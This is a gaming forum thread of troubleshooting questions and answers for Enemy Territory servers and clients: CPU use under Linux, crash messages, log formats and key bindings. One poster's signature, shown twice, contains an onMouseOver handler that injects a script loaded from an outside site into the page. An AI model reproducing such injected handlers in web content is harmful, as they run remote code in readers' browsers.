Common problems with ET (not just etpro)

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

bani
Site Admin

Common problems with ET (not just etpro)

Post by bani »

Linux:

Q: "my linux et server is taking 90% cpu even when empty, why?"
A: You have TLS installed, et doesnt like it. Do export LD_ASSUME_KERNEL=2.4.1 before calling etded to fix it.

Q: "my server keeps dying with the message 'ERROR: Info_SetValueForKey: oversize infostring'"
A: Remove all the "sets" commands from your configs.

Q: "I keep getting 'R_AddEntitySurfaces: Bad reType'"
A: Nvidia control panel -> OpenGl Menu -> Vertical Sync -> Always Disabled

Q: "(some stats/logparser program) doesn't work with etpro!"
A: b_logrealtimestamps 0, b_brokenlogtimestamps 1 will make etpro log in the old broken etmain log format that some log analysers expect.
Last edited by bani on Tue Nov 04, 2003 2:24 am, edited 4 times in total.
Heimdal

Post by Heimdal »

Often when I press ctrl+alt at the same time (Topshots+My own stats) ET crashes.. really annoying when you do it by mistake.
gotenks

Post by gotenks »

common bug (engine i think) i've never had it happen though
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
Balthazar

Post by Balthazar »

I posted this in Server Admin but I gifured I would post it here too, so hopefully I can get it worked out.

Hey guys I have been having problems as I stated before but I seem to have found the error code that may help me fix this problem. Here is what I get from the server window when the server crashes...

Z_Malloc failed on allocation of 32832 bits from the main zone.

Can anyone help me with this so I can stop the server from crashing.
EZCChaos

Post by EZCChaos »

another problem is the tank breaking on goldrush if you damage it at that certain spot at the start of spawn and then it can't be repaired and hte map has to be restarted.
The right perception of any matter and a misunderstanding of the same matter do not wholly exclude each other
[NSS+]Subterfuge

Post by [NSS+]Subterfuge »

Heimdal wrote:Often when I press ctrl+alt at the same time (Topshots+My own stats) ET crashes.. really annoying when you do it by mistake.
This is also true for pressing Numpad 0 + Numpad 1

Sub
Fade2Black

Post by Fade2Black »

My worse config has to be ALT (Crouch) and typing a message when pressing ALT thn press ENTER to ssend and whey - the screen minimises.

30 s later when it maximises im rarely alive!!
Blackout

Post by Blackout »

I've been trying out ET on a debian box recently, and it's been great so far, but I have one small question:

I've noticed that my control key behaves in ET the same way it does on a tty or VT102-emulating Xterm. For example, if I hit CTRL+3 (I use CTRL for crouch and 3 for weaponbank 3) in game, it sends an ESC. Should I reconfigure my controls or is there a workaround this?
Rain

Post by Rain »

There's not really a way around it...
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
IdNotFound

Post by IdNotFound »

I have the very same problem (same functions binded)... It is so evil :?

I'm not a leet linux user (actually I'm a lousy linux user) but isn't there a way to fix/patch this editing sources/recompiling or something? "Linux leet gamer patch for X" or something hehehe :P
Image nZ/IdNotFound
NaZGûL TeaM Leader
SAWL Tech Staff
Rain

Post by Rain »

You can change the behavior of XLookupString, but you run the risk of breaking other applications which expect things to work the way they do now if you just edit xlib and recompile it...
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
IdNotFound

Post by IdNotFound »

Rain wrote:You can change the behavior of XLookupString, but you run the risk of breaking other applications which expect things to work the way they do now if you just edit xlib and recompile it...
Oh... :cry:
Image nZ/IdNotFound
NaZGûL TeaM Leader
SAWL Tech Staff
Blackout

Post by Blackout »

I appreciate the explanation, I'll move everything to alpha and number key only (ESDF++).
[MoB]Seany

Post by [MoB]Seany »

Heimdal wrote:Often when I press ctrl+alt at the same time (Topshots+My own stats) ET crashes.. really annoying when you do it by mistake.
I think i had somthing like this happen to me the other day..But it may have been somthing else. It was stuck on the scoreboard and topshots, I could still look around and shoot, but my keyboard was completly inactive, but still plugged in, as a capslock light was on. Probably somthing else though..
[MoB]

NetNut: "I never cheat on a FPS game, but i will use my aimbot for Minesweeper or Solitare."
ReyalP

Post by ReyalP »

[MoB]Seany wrote:
That particular bug should be fixed in et 2.60
send lawyers, guns and money